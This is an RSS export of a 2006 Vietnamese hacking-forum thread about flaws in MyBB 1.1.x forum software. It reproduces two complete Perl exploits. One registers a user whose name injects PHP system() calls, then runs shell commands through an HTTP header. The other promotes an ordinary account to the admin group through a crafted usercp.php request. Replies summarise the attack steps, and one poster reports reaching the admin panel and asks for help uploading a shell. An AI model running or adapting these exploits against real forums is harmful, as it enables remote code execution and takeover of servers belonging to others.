<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
	<channel>
		<title><![CDATA[Latest posts for the topic "Improper user validation allows attackers to execute PHP code in myBB"]]></title>
		<link>http://www.hvaonline.net/hvaonline/posts/list/13.hva</link>
		<description><![CDATA[Latest messages posted in the topic "Improper user validation allows attackers to execute PHP code in myBB"]]></description>
		<generator>JForum - http://www.jforum.net</generator>
			<item>
				<title>Improper user validation allows attackers to execute PHP code in myBB</title>
				<description><![CDATA[ <span class="link"> http://www.mybboard.com/</span> MyBB is a powerful, efficient and free forum package developed in PHP and MySQL.

Improper user validation allows attackers to execute PHP code in myBB.

Vulnerable Systems: MyBB version 1.1.2

Exploit:
<span class="quotetxt"><b>Code:</b></span><br/>
		<div class="coded"">
		<pre>#!/usr/bin/perl
# Tue Jun 13 12:37:12 CEST 2006 jolascoaga@514.es
#
# Exploit HOWTO - read this before flood my Inbox you bitch!
#
# - First you need to create the special user to do this use:
# ./mybibi.pl --host=http://www.example.com --dir=/mybb -1
#   this step needs a graphic confirmation so the exploit writes a file
#   in /tmp/file.png, you need to
#   see this img and put the text into the prompt. If everything is ok,
#   you'll have a new valid user created.
# * There is a file mybibi_out.html where the exploit writes the output
#   for debugging.
# - After you have created the exploit or if you have a valid non common
#   user, you can execute shell commands.
#
# TIPS:
#  * Sometimes you have to change the thread Id, --tid is your friend ;&#41;
# * Don't forget to change the email. You MUST activate the account.
# * Mejor karate aun dentro ti.
#
# LIMITATIONS:
# * If the admin have the username lenght &lt; 28 this exploit doesn't works
#
# Greetz to !dSR ppl and unsec
#
# 514 still r0xing!

# user config.
my $uservar = "C"; # don't use large vars.
my $password = "514r0x";
my $email = "514\@mailinator.com";

use LWP::UserAgent;
use HTTP::Cookies;
use LWP::Simple;
use HTTP::Request::Common "POST";
use HTTP::Response;
use Getopt::Long;
use strict;

$| = 1;   # you can choose this or another one.

my &#40;$proxy,$proxy_user,$proxy_pass, $username&#41;;
my &#40;$host,$debug,$dir, $command, $del, $first_time, $tid&#41;;
my &#40;$logged, $tid&#41; = &#40;0, 2&#41;;

$username = "'.system&#40;getenv&#40;HTTP_".$uservar."&#41;&#41;.'";

my $options = GetOptions &#40;
  'host=s'       =&gt; \$host,
  'dir=s'       =&gt; \$dir,
  'proxy=s'           =&gt; \$proxy,
  'proxy_user=s'      =&gt; \$proxy_user,
  'proxy_pass=s'      =&gt; \$proxy_pass,
  'debug'             =&gt; \$debug,
  '1'        =&gt; \$first_time,
  'tid=s'       =&gt; \$tid,
  'delete'       =&gt; \$del&#41;;

&help unless &#40;$host&#41;; # please don't try this at home.

$dir = "/" unless&#40;$dir&#41;;
print "$host - $dir\n";
if &#40;$host !~ /^http/&#41; {
 $host = "http://".$host;
}

LWP::Debug::level&#40;'+'&#41; if $debug;
my &#40;$res, $req&#41;;

my $ua = new LWP::UserAgent&#40;
           cookie_jar=&gt; { file =&gt; "$$.cookie" }&#41;;
$ua-&gt;agent&#40;"Mothilla/5.0 &#40;THIS IS AN EXPLOIT. IDS, PLZ, Gr4b ME!!!"&#41;;
$ua-&gt;proxy&#40;&#91;'http'&#93; =&gt; $proxy&#41; if $proxy;
$req-&gt;proxy_authorization_basic&#40;$proxy_user, $proxy_pass&#41; if $proxy_user;

create_user&#40;&#41; if $first_time;

while &#40;&#41; {
  login&#40;&#41; if !$logged;

  print "mybibi&gt; "; # lost connection
  while&#40;&lt;STDIN&gt;&#41; {
    $command=$_;
    chomp&#40;$command&#41;;
    last;
  }
  &send&#40;$command&#41;;
}

sub send  {
 chomp &#40;my $cmd = shift&#41;;
 my $h = $host.$dir."/newthread.php";
 my $req = POST $h, &#91;
  'subject' =&gt; '514',
  'message' =&gt; '/slap 514',
  'previewpost' =&gt; 'Preview Post',
  'action' =&gt; 'do_newthread',
  'fid' =&gt; $tid,
  'posthash' =&gt; 'e0561b22fe5fdf3526eabdbddb221caa'
 &#93;;
 $req-&gt;header&#40;$uservar =&gt; $cmd&#41;;
 print $req-&gt;as_string&#40;&#41; if $debug;
 my $res = $ua-&gt;request&#40;$req&#41;;
 if &#40;$res-&gt;content =~ /You may not post in this/&#41; {
  print "&#91;!&#93; don't have perms to post. Change the Forum ID\n";
 } else {
  my &#40;$data&#41; = $res-&gt;content =~ m/&#40;.*?&#41;\&lt;\!DOCT/is;
  print $data;
 }

}
sub login {
 my $h  = $host.$dir."/member.php";
 my $req = POST $h,&#91;
  'username' =&gt; $username,
  'password' =&gt; $password,
  'submit' =&gt; 'Login',
  'action' =&gt; 'do_login'
 &#93;;
 my $res = $ua-&gt;request&#40;$req&#41;;
 if &#40;$res-&gt;content =~ /You have successfully been logged/is&#41; {
  print "&#91;*&#93; Login succesful!\n";
  $logged = 1;
 } else {
  print "&#91;!&#93; Error login-in\n";
 }
}

sub help {
    print "Syntax: ./$0 --host=url --dir=/mybb &#91;options&#93; -1 --tid=2\n";
    print "\t--proxy &#40;http&#41;, --proxy_user, --proxy_pass\n";
    print "\t--debug\n";
    print "the default directory is /\n";
    print "\nExample\n";
    print "bash# $0 --host=http&#40;s&#41;://www.server.com/\n";
    print "\n";
    exit&#40;1&#41;;
}

sub create_user {
 # firs we need to get the img.
 my  $h = $host.$dir."/member.php";
 print "Host: $h\n";

 $req = HTTP::Request-&gt;new &#40;GET =&gt; $h."?action=register"&#41;;
 $res = $ua-&gt;request &#40;$req&#41;;

 my $req = POST $h, &#91;
  'action' =&gt; "register",
  'agree' =&gt; "I Agree"
 &#93;;
 print $req-&gt;as_string&#40;&#41; if $debug;
 $res = $ua-&gt;request&#40;$req&#41;;

 my $content = $res-&gt;content&#40;&#41;;
 $content =~ m/.*&#40;image\.php\?action.*?&#41;\".*/is;
 my $img = $1;
 my $req = HTTP::Request-&gt;new &#40;GET =&gt; $host.$dir."/".$img&#41;;
 $res = $ua-&gt;request &#40;$req&#41;;
 print $req-&gt;as_string&#40;&#41;;

 if &#40;$res-&gt;content&#41; {
  open &#40;TMP, "&gt;/tmp/file.png"&#41; or die&#40;$!&#41;;
  print TMP $res-&gt;content;
  close &#40;TMP&#41;;
  print "&#91;*&#93; /tmp/file.png created.\n";
 }

 my &#40;$hash&#41; = $img =~ m/hash=&#40;.*?&#41;$/;
 my $img_str = get_img_str&#40;&#41;;
 unlink &#40;"/tmp/file.png"&#41;;
 $img_str =~ s/\n//g;
 my $req = POST $h, &#91;
  'username' =&gt; $username,
  'password' =&gt; $password,
  'password2' =&gt; $password,
  'email' =&gt; $email,
  'email2' =&gt; $email,
  'imagestring' =&gt; $img_str,
  'imagehash' =&gt; $hash,
  'allownotices' =&gt; 'yes',
  'receivepms' =&gt; 'yes',
  'pmpopup' =&gt; 'no',
  'action' =&gt; "do_register",
  'regsubmit' =&gt; "Submit Registration"
 &#93;;
 $res = $ua-&gt;request&#40;$req&#41;;
 print $req-&gt;as_string&#40;&#41; if $debug;

 open &#40;OUT, "&gt;mybibi_out.html"&#41;;
 print OUT $res-&gt;content;

 print "Check $email for confirmation or mybibi_out.html if there are some 
error\n";
}

sub get_img_str &#40;&#41;
{
 print "\nNow I need the text shown in /tmp/file.png: ";
 my $str = &lt;STDIN&gt;;
 return $str;
}
exit 0;

# EoF</pre>
		</div>]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/165.hva#563</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/165.hva#563</link>
				<pubDate><![CDATA[Tue, 20 Jun 2006 21:15:54]]> GMT</pubDate>
				<author><![CDATA[ conmale]]></author>
			</item>
			<item>
				<title>Improper user validation allows attackers to execute PHP code in myBB</title>
				<description><![CDATA[ em đọc đoạn code exploite na`y , em vẫn chưa hiểu gì cả nhờ anh conmale nói kĩ về bug của loại forum này được không ạ ? cảm ơn anh nhiều.]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/165.hva#986</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/165.hva#986</link>
				<pubDate><![CDATA[Mon, 26 Jun 2006 12:41:36]]> GMT</pubDate>
				<author><![CDATA[ lonely_Xorhandsome]]></author>
			</item>
			<item>
				<title>Improper user validation allows attackers to execute PHP code in myBB</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">lonely_Xorhandsome wrote:</cite><br>
		<blockquote>em đọc đoạn code exploite na`y , em vẫn chưa hiểu gì cả nhờ anh conmale nói kĩ về bug của loại forum này được không ạ ? cảm ơn anh nhiều.&nbsp;
		</blockquote>

Vậy điều em cần làm trước là nghiên cứu Perl căn bản đã.]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/165.hva#1001</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/165.hva#1001</link>
				<pubDate><![CDATA[Mon, 26 Jun 2006 13:07:17]]> GMT</pubDate>
				<author><![CDATA[ conmale]]></author>
			</item>
			<item>
				<title>Improper user validation allows attackers to execute PHP code in myBB</title>
				<description><![CDATA[ Và đây nữa :
<span class="quotetxt"><b>Code:</b></span><br/>
		<div class="coded"">
		<pre>#!/usr/bin/perl
# MyBulletinBoard &#40;MyBB&#41; &lt;= 1.1.3 Create An Admin Exploit
#
# www.h4ckerz.com / hackerz.ir / aria-security.net / Myimei.com /
# ./2006-6-23
### Coded By Hessam-x / Hessamx-at-Hessamx.net

use IO::Socket; 
use LWP::UserAgent;
use HTTP::Cookies;


 $host = $ARGV&#91;0&#93;;
 $uname = $ARGV&#91;1&#93;;
 $passwd = $ARGV&#91;2&#93;;
 $url = "http://".$host;
 
 print q&#40;
 ###########################################################
 # MyBulletinBoard &#40;MyBB&#41; &lt;= 1.1.3 Create An Admin Exploit #
 #           www.hackerz.ir - www.h4ckerz.com              #
 ################### Coded By Hessam-x #####################

&#41;;


 
 if &#40;@ARGV &lt; 3&#41; {
 print " #  usage : hx.pl &#91;host&path&#93; &#91;uname&#93; &#91;pass&#93;\n"; 
 print " #  E.g : hx.pl www.milw0rm.com/mybb/ str0ke 123456\n"; 
  exit&#40;&#41;;
 }
 
    print " &#91;~&#93; User/Password : $uname/$passwd \n";
    print " &#91;~&#93; Host : $host \n";
    print " &#91;~&#93; Login ... ";


   
$xpl = LWP::UserAgent-&gt;new&#40;&#41; or die;
$cookie_jar = HTTP::Cookies-&gt;new&#40;&#41;;

$xpl-&gt;cookie_jar&#40; $cookie_jar &#41;;
 $res = $xpl-&gt;post&#40;$url.'member.php',
 Content =&gt; &#91;
 "action"   =&gt; "do_login",
 "username"   =&gt; "$uname",
 "password"   =&gt; "$passwd",
 "submit"      =&gt; "Login",
 &#93;,&#41;;
 
 if&#40;$cookie_jar-&gt;as_string =~ /mybbuser=&#40;.*?&#41;;/&#41; { 
  print "successfully .\n";
  } else { 
  print "UNsuccessfully !\n";
  print " &#91;-&#93; Can not Login In $host !\n"; 
  exit&#40;&#41;; 
  }
 
$req = $xpl-&gt;get&#40;$url.'usercp.php?action=do_options&showcodebuttons=1\',additionalgroups=\'4'&#41;;
$tst = $xpl-&gt;get&#40;$url.'index.php'&#41;;
if &#40;$tst-&gt;as_string =~ /Admin CP/&#41; { 
print " &#91;+&#93; You Are Admin Now !!";
} else {
    print " &#91;-&#93; Exploit Failed !";
    }

# milw0rm.com &#91;2006-06-25&#93;</pre>
		</div>

]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/165.hva#1007</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/165.hva#1007</link>
				<pubDate><![CDATA[Mon, 26 Jun 2006 13:14:15]]> GMT</pubDate>
				<author><![CDATA[ DaoDuyHieu]]></author>
			</item>
			<item>
				<title>Improper user validation allows attackers to execute PHP code in myBB</title>
				<description><![CDATA[ ==
Cái code ở dưởi chắc là explot lên quyền :D qua 
usercp.php?action=do_options&showcodebuttons=1
nâng quyền lên group 4 (group admin )
==
Cái code ở trên thì đầu tiên, ta có 1 u/p để send lên MyBB 1 topic mới như sau :
   'subject' => '514',
   'message' => '/slap 514',
   'previewpost' => 'Preview Post',
   'action' => 'do_newthread',
   'fid' => $tid,
   'posthash' => 'e0561b22fe5fdf3526eabdbddb221caa'

rồi up tiếp cái file ảnh thì phải (file.png) -> /tmp/file.png
P/S: cái sau có vẻ khó hiểu và khó exploit hơn
:)]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/165.hva#1154</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/165.hva#1154</link>
				<pubDate><![CDATA[Mon, 26 Jun 2006 18:21:47]]> GMT</pubDate>
				<author><![CDATA[ dinhcaohack]]></author>
			</item>
			<item>
				<title>Improper user validation allows attackers to execute PHP code in myBB</title>
				<description><![CDATA[ Vô dc ACP, tìm cách up shell nhưng ko dc, các pro bit chỉ em. Thx]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/165.hva#1223</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/165.hva#1223</link>
				<pubDate><![CDATA[Mon, 26 Jun 2006 20:23:24]]> GMT</pubDate>
				<author><![CDATA[ Tinoo]]></author>
			</item>
	</channel>
</rss>
